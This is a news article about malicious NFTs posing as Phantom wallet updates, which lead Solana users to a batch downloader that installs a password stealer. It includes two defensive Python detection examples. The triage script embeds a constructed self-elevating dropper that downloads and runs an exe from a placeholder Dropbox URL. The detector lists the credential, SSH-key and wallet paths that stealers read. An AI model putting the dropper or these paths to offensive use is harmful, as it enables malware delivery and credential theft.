NFTs are Stealing Passwords in Name of Solana through Phantom

Malicious NFTs sent to Solana wallet holders pose as a Phantom security alert and deliver password-stealing malware

Attackers are sending NFTs to Solana wallet holders that pose as a security alert from the developers of the Phantom wallet, and are using them as a lure to implant malware on victims' devices. The ongoing campaign began two weeks ago, with NFTs titled 'PHANTOMUPDATE.COM' or 'UPDATEPHANTOM.COM' delivered to wallets. When the NFT is opened, the owner is told that a new security update has been released and that they should click the enclosed link or visit the site to download and install it. "Phantom requires all users to update their wallets. This must be done as soon as possible," reads the warning in the fake Phantom update NFT. "Failing to do so may result in loss of funds due to hackers exploiting the Solana network. Visit www.updatePhantom.com to get the latest security update." Neither the Phantom browser extension nor its mobile app is updated through a link in a token that appears in the wallet; both update through the browser's extension store and the mobile app stores, so an "update" delivered this way is a phishing lure by definition.

Anyone who visits either site, from a desktop or a mobile device, gets an automatic download of a Windows batch file named Phantom_Update_2022-10-08.bat [VirusTotal], served from Dropbox; earlier waves of the campaign delivered executables named Phantom_Update_2022-10-04.exe. When launched, the batch file checks whether it is running with Administrator privileges and, if not, triggers a Windows UAC prompt to request them. Once it has those rights it retrieves and runs the actual payload, windll32.exe. The delivery mechanism is itself the tell: no browser-extension or mobile wallet update arrives as a .bat file, and none needs administrator rights on the machine.
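The check-for-admin, re-launch-through-UAC, pull-a-second-stage pattern described above is cheap to triage statically before anything is executed. The Python script below is an added example, not code from the article or from the malware: it scores a batch file on five indicators (an elevated-token check, a UAC re-launch, a download primitive, a file-hosting URL, and an executable dropped under %TEMP%). The three sample scripts embedded in it are constructed for illustration, with a placeholder Dropbox URL and file name; none of them is the real Phantom_Update file.

```python
"""Static triage of a Windows batch downloader (added example, not the article's code)."""
import re
from dataclasses import dataclass, field

# Constructed sample modelled on the behaviour described above: check for an
# elevated token, re-launch through UAC if needed, then pull a second stage
# from a file host into %TEMP% and run it. NOT the real Phantom_Update file;
# the URL and file name are placeholders.
SAMPLE_DROPPER = r"""@echo off
net session >nul 2>&1
if %errorLevel% neq 0 (
    powershell -Command "Start-Process '%~f0' -Verb RunAs"
    exit /b
)
powershell -Command "Invoke-WebRequest -Uri https://www.dropbox.com/s/EXAMPLE/payload.exe?dl=1 -OutFile %TEMP%\windll32.exe"
start /b %TEMP%\windll32.exe
"""

# Constructed comparison scripts: a plain maintenance job, and a legitimate
# admin script that self-elevates but downloads nothing.
SAMPLE_BENIGN = r"""@echo off
echo Rotating logs
xcopy C:\logs D:\backup\logs /E /I /Y
"""
SAMPLE_ADMIN_ONLY = r"""@echo off
net session >nul 2>&1 || (powershell -Command "Start-Process '%~f0' -Verb RunAs" & exit /b)
sc config Spooler start= disabled
"""

INDICATORS = {
    # ways a script tests whether it already holds an elevated token
    "admin_check": re.compile(
        r"net\s+session|\bfltmc\b|\bopenfiles\b|whoami\s+/groups|S-1-16-12288", re.I),
    # re-launching itself through a UAC consent prompt
    "uac_relaunch": re.compile(r"-Verb\s+RunAs|\bShellExecute\b|\brunas\s+/", re.I),
    # download primitives reachable from batch/PowerShell
    "downloader": re.compile(
        r"Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|\bbitsadmin\b|certutil\s+-urlcache"
        r"|DownloadFile|DownloadString|Start-BitsTransfer", re.I),
}
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
FILE_HOSTS = ("dropbox.com", "discord.com/attachments", "discordapp.com", "transfer.sh")
DROPPED_RE = re.compile(r"%TEMP%\\[\w.-]+\.(?:exe|dll|ps1|bat|vbs)", re.I)


@dataclass
class Triage:
    hits: dict = field(default_factory=dict)       # indicator -> matched snippets
    urls: list = field(default_factory=list)
    file_host_urls: list = field(default_factory=list)
    dropped: list = field(default_factory=list)    # paths written under %TEMP%

    @property
    def score(self) -> int:
        return len(self.hits) + bool(self.file_host_urls) + bool(self.dropped)

    @property
    def verdict(self) -> str:
        if self.score >= 4:
            return "likely self-elevating downloader"
        if self.score >= 2:
            return "suspicious: review"
        return "no indicators"


def triage_batch(text: str) -> Triage:
    """Score batch-file text on the indicators above; pure string matching, nothing is run."""
    t = Triage()
    for name, pattern in INDICATORS.items():
        found = sorted({m.group(0) for m in pattern.finditer(text)})
        if found:
            t.hits[name] = found
    t.urls = URL_RE.findall(text)
    t.file_host_urls = [u for u in t.urls if any(h in u.lower() for h in FILE_HOSTS)]
    t.dropped = sorted(set(DROPPED_RE.findall(text)))
    return t


if __name__ == "__main__":
    for label, sample in [("dropper", SAMPLE_DROPPER), ("admin-only", SAMPLE_ADMIN_ONLY),
                          ("benign", SAMPLE_BENIGN)]:
        t = triage_batch(sample)
        print(f"{label:10s} score={t.score} verdict={t.verdict}")
        for name, found in t.hits.items():
            print(f"  {name}: {found}")
        for u in t.file_host_urls:
            print(f"  file-host url: {u}")
        for p in t.dropped:
            print(f"  dropped: {p}")
```

The admin-only sample scores 2 and lands in "review" rather than "likely downloader": self-elevation on its own is common in legitimate administration scripts, and it is the combination with a download from a consumer file host and an executable written to %TEMP% that makes the verdict. Obfuscated scripts (base64 PowerShell, caret-split tokens) will slip past plain regexes, so this is a first-pass filter, not a replacement for detonation.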

According to VirusTotal, windll32.exe is a password-stealing trojan that harvests browser data such as history, cookies and saved passwords, as well as SSH keys and other information. Which stealer family is currently being spread is unclear; earlier waves of the campaign distributed a file named lib64.exe [VirusTotal], which was identified as MarsStealer. MarsStealer is an information-stealing malware launched in 2020 that targets all popular web browsers, two-factor authentication browser extensions, and many cryptocurrency wallet extensions and desktop wallets. The campaign's goal is most likely to collect wallet data and saved credentials that let the threat actors drain the victim's crypto funds and take over other accounts belonging to the victim. Anyone who ran one of these files should treat every credential, session cookie, SSH key and wallet on that machine as compromised: move funds to a wallet created on a clean device, rotate passwords and SSH keys, and invalidate active sessions rather than only changing passwords.
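On the endpoint, what separates a stealer from ordinary software is not any single file it reads but the breadth of sensitive stores one process touches in a short span. The detector below is an added example, not code from the article or from any vendor: it classifies file-read events by artifact class (browser credential and cookie databases, the .ssh directory, Chromium extension storage where wallet and 2FA extensions keep their local state, and desktop wallet files) and alerts when a non-browser process reaches two or more classes within 60 seconds. The events are constructed EDR-style records; the windll32.exe name comes from the article, while the user name, the other process names and the 32-character extension ID are placeholders.

```python
"""Breadth-of-access detector for infostealer behaviour (added example, not the article's code)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Artifact classes an infostealer of this kind goes after. Paths are Windows
# user-profile locations; the extension-store pattern matches any Chromium
# extension ID (32 chars, a-p), which is where wallet and 2FA extensions keep
# their local state.
ARTIFACTS = {
    "browser_credentials": re.compile(r"\\(Login Data|Web Data|logins\.json|key4\.db)$", re.I),
    "browser_cookies_history": re.compile(r"\\(Cookies|History|cookies\.sqlite|places\.sqlite)$", re.I),
    "ssh_keys": re.compile(r"\\\.ssh\\(id_[a-z0-9]+|config)$", re.I),
    "browser_extension_store": re.compile(r"\\Local Extension Settings\\[a-p]{32}\\", re.I),
    "wallet_files": re.compile(
        r"\\\.config\\solana\\id\.json$|\\Exodus\\exodus\.wallet\\|\\Electrum\\wallets\\", re.I),
}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
WINDOW = timedelta(seconds=60)

# Constructed EDR-style file-read events: (timestamp, pid, image, path).
# The user name, the extension ID and every process name other than
# windll32.exe (which the article names) are placeholders.
PROFILE = r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default"
EVENTS = [
    ("2022-10-10T09:00:01", 1200, "chrome.exe", PROFILE + r"\Login Data"),
    ("2022-10-10T09:00:02", 1200, "chrome.exe", PROFILE + r"\Cookies"),
    ("2022-10-10T09:05:00", 4410, "ssh.exe", r"C:\Users\alice\.ssh\id_ed25519"),
    ("2022-10-10T09:12:10", 5120, "windll32.exe", PROFILE + r"\Login Data"),
    ("2022-10-10T09:12:10", 5120, "windll32.exe", PROFILE + r"\Cookies"),
    ("2022-10-10T09:12:11", 5120, "windll32.exe",
     PROFILE + r"\Local Extension Settings\aaaabbbbccccddddeeeeffffgggghhhh\000003.log"),
    ("2022-10-10T09:12:12", 5120, "windll32.exe", r"C:\Users\alice\.ssh\id_rsa"),
    ("2022-10-10T09:12:12", 5120, "windll32.exe", r"C:\Users\alice\.config\solana\id.json"),
    # a backup job touching two classes two hours apart: outside the window
    ("2022-10-10T09:30:00", 6001, "backup.exe", r"C:\Users\alice\.ssh\id_rsa"),
    ("2022-10-10T11:30:00", 6001, "backup.exe", PROFILE + r"\History"),
]


def classify(path: str) -> list:
    """Artifact classes a path belongs to (usually zero or one)."""
    return [name for name, rx in ARTIFACTS.items() if rx.search(path)]


def detect_stealer_access(events, window=WINDOW, min_classes=2) -> list:
    """Alert on any process that reads >= min_classes artifact classes within `window`.
    A browser reading its own profile stores is expected and is not counted."""
    per_proc = defaultdict(list)
    for ts, pid, image, path in events:
        classes = classify(path)
        if image.lower() in BROWSERS:
            classes = [c for c in classes if not c.startswith("browser_")]
        if classes:
            per_proc[(pid, image)].append((datetime.fromisoformat(ts), classes))

    alerts = []
    for (pid, image), hits in per_proc.items():
        hits.sort(key=lambda h: h[0])
        best = set()
        # slide a window over the process's hits and keep the widest class set
        for i, (start, _) in enumerate(hits):
            reached = set()
            for t, classes in hits[i:]:
                if t - start > window:
                    break
                reached.update(classes)
            if len(reached) > len(best):
                best = reached
        if len(best) >= min_classes:
            alerts.append({"pid": pid, "image": image, "classes": sorted(best)})
    return alerts


if __name__ == "__main__":
    for a in detect_stealer_access(EVENTS):
        print(f"ALERT pid={a['pid']} image={a['image']} classes={a['classes']}")
```

Run against the sample events, only windll32.exe alerts: chrome.exe is excluded from its own profile, ssh.exe touches a single class, and backup.exe reaches two classes but two hours apart. The window and the class threshold are the tuning knobs; backup and sync agents are the usual false positives and are better handled by an allow-list on image path and signer than by widening the window. In a real deployment, pair this with process ancestry, since a payload spawned by a .bat that a browser just downloaded is a far stronger signal than the file reads alone.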

Analytics Insight
www.analyticsinsight.net